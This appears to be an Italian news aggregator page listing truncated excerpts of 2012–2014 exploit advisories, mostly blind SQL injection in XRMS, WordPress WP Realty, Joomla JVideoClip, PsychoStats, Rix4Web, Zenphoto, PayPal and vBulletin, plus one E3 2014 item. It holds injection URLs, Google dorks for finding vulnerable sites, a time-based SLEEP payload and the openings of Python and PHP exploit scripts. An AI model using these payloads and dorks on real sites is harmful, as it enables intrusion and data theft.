XRMS Blind SQL Injection / Command Execution

28 agosto 2014 - Fonte: http://www.mondounix.com
#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
  ...

Leggi il seguito »

Microsoft: conferenza E3 2014

9 giugno 2014 - Fonte: http://www.outofbit.it

Microsoft ha ufficialmente inaugurato la nuova edizione della mastodontica fiera “E3” tenuta a Los Angeles.

microsoft e3 rumors Microsoft: conferenza E3 2014

La conferenza ha fin da subito mostrato i titoli di maggior successo mediatico ponendoci un trailer del nuovo gioco di Activion chiamato “Call of duty: Advance Warfare“. Il nuovo capitolo della saga sfrutterà un nuovo...

Leggi il seguito »

WordPress WP Realty Blind SQL Injection

28 ottobre 2013 - Fonte: http://www.mondounix.com
$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits...

Leggi il seguito »

mod_accounting 0.5 Blind SQL Injection

29 settembre 2013 - Fonte: http://www.mondounix.com
   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received...

Leggi il seguito »

Joomla JVideoClip Blind SQL Injection

24 settembre 2013 - Fonte: http://www.mondounix.com
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind...

Leggi il seguito »

PsychoStats 3.2.2b Blind SQL Injection

29 marzo 2013 - Fonte: http://www.mondounix.com
Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end
...

Leggi il seguito »

Rix4Web Portal Remote Blind SQL Injection

24 febbraio 2013 - Fonte: http://www.mondounix.com
################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
#...

Leggi il seguito »

Zenphoto 1.4.4.1 Blind SQL Injection

21 febbraio 2013 - Fonte: http://www.mondounix.com
######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org     ...

Leggi il seguito »

Paypal.com Blind SQL Injection

23 gennaio 2013 - Fonte: http://www.mondounix.com
Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability
 
 
Date:
=====
2013-01-22
 
 
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
 
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml
 
 
VL-ID:
=====
673
 
 
Common Vulnerability Scoring System:
====================================
8.3
 
 
Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money...

Leggi il seguito »

vBulletin 3.x / 4.x AjaxReg SQL Injection

10 dicembre 2012 - Fonte: http://www.mondounix.com
#!/usr/bin/php
<?
 
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
 
function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
        "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname>...

Leggi il seguito »